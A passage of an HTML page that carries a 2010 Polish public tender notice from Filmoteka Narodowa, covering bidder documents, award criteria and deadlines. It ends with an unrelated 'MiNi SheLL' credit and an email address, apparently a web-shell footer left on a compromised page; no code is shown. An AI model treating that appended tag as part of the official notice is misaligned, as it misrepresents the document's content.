<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość materiału testowego - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.fn.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Filmoteka Narodowa, ul. Puławska 61, 00-975 Warszawa Sekretariat, pokój 101, I-piętro. Sekretariat Zamawiającego pracuje w dni robocze od poniedziałku do piątku w godzinach 8-16..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2010 godzina 10:00, miejsce: Filmoteka Narodowa, ul. Puławska 61, 00-975 Warszawa Sekretariat, pokój 101, I-piętro. Sekretariat Zamawiającego pracuje w dni robocze od poniedziałku do piątku w godzinach 8-16..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com